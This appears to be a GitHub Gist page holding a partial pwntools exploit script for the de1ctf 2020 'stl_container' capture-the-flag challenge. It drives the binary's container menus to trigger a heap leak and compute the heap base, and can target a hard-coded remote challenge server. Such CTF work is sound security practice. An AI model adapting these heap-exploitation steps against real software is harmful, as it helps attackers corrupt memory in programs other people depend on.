Last active
May 24, 2021 20:46
-
-
Save hugsy/91cee8adf747ff341d909fa5692b8a66 to your computer and use it in GitHub Desktop.
[de1ctf 2020] stl_container
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3.8 | |
| import sys | |
| from pwn import * | |
| context.update( | |
| arch="amd64", | |
| endian="little", | |
| os="linux", | |
| # log_level="debug", | |
| terminal=["tmux", "split-window", "-h", "-p 65"], | |
| ) | |
| ok = success | |
| REMOTE = False | |
| TARGET_ELF="/home/hugsy/ctf/de1ctf_2020/stl_container/stl_container" | |
| TARGET_LIBC="/home/hugsy/ctf/de1ctf_2020/stl_container/libc-2.27.so" | |
| elf = ELF(TARGET_ELF) | |
| libc = ELF(TARGET_LIBC) | |
| def attach(r): | |
| if not REMOTE: | |
| bkps = [] # elf.symbols["main"], ] | |
| cmds = [ | |
| 'heap-analysis-helper', | |
| 'c', | |
| ] | |
| gdb.attach(r, '\n'.join(["break {:#x}".format(x) for x in bkps] + cmds)) | |
| return | |
| ####### list | |
| def list_alloc(r, data): | |
| r.recvuntil(">> ") | |
| r.sendline("1") # list | |
| r.recvuntil(">> ") | |
| r.sendline("1") # add | |
| r.recvuntil(" data:") | |
| r.send(data) | |
| def list_show(r, idx): | |
| r.recvuntil(">> ") | |
| r.sendline("1") # list | |
| r.recvuntil(">> ") | |
| r.sendline("3") # show | |
| r.recvuntil("index?\n") | |
| r.sendline(f"{idx}") | |
| r.recvuntil("data: ") | |
| return r.recvuntil(">> ") | |
| def list_delete(r, idx): | |
| r.recvuntil(">> ") | |
| r.sendline("1") # list | |
| r.recvuntil(">> ") | |
| r.sendline("2") # delete | |
| r.recvuntil("index?\n") | |
| r.sendline(f"{idx}") | |
| ####### vector | |
| def vector_alloc(r, data): | |
| r.recvuntil(">> ") | |
| r.sendline("2") # list | |
| r.recvuntil(">> ") | |
| r.sendline("1") # add | |
| r.recvuntil(" data:") | |
| r.send(data) | |
| def vector_show(r, idx): | |
| r.recvuntil(">> ") | |
| r.sendline("2") # list | |
| r.recvuntil(">> ") | |
| r.sendline("3") # show | |
| r.recvuntil("index?\n") | |
| r.sendline(f"{idx}") | |
| r.recvuntil("data: ") | |
| return r.recvuntil(">> ") | |
| def vector_delete(r, idx): | |
| r.recvuntil(">> ") | |
| r.sendline("2") # list | |
| r.recvuntil(">> ") | |
| r.sendline("2") # delete | |
| r.recvuntil("index?\n") | |
| r.sendline(f"{idx}") | |
| ####### queue | |
| def queue_alloc(r, data): | |
| r.recvuntil(">> ") | |
| r.sendline("3") # queue | |
| r.recvuntil(">> ") | |
| r.sendline("1") # add | |
| r.recvuntil(" data:") | |
| r.send(data) | |
| def queue_delete(r, idx): | |
| r.recvuntil(">> ") | |
| r.sendline("3") # queue | |
| r.recvuntil(">> ") | |
| r.sendline("2") # delete | |
| r.recvuntil("index?\n") | |
| r.sendline(f"{idx}") | |
| ####### queue | |
| def stack_alloc(r, data): | |
| r.recvuntil(">> ") | |
| r.sendline("4") # stack | |
| r.recvuntil(">> ") | |
| r.sendline("1") # add | |
| r.recvuntil(" data:") | |
| r.send(data) | |
| def stack_delete(r, idx): | |
| r.recvuntil(">> ") | |
| r.sendline("4") # stack | |
| r.recvuntil(">> ") | |
| r.sendline("2") # delete | |
| def exploit(r): | |
| attach(r) | |
| stack_alloc(r, b"A"*0x98) | |
| stack_alloc(r, b"B"*0x98) | |
| vector_alloc(r, b"C"*0x98) | |
| stack_delete(r, 0) | |
| vector_alloc(r, b"\x50") | |
| res = vector_show(r, 1) | |
| heap_leak = u64(res[:res.find(b"\x0a")].ljust(8, b"\x00")) | |
| heap_base = (heap_leak & 0xffffffffffffff00) - 0x12400 | |
| ok("heap base %x" % heap_base) | |
| r.interactive() | |
| return | |
| if __name__ == "__main__": | |
| if REMOTE == True: | |
| r = remote("134.175.239.26", 8848) | |
| else: | |
| r = process([TARGET_ELF,], env={"LD_PRELOAD": libc.path}) | |
| exploit(r) | |
| sys.exit(0) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment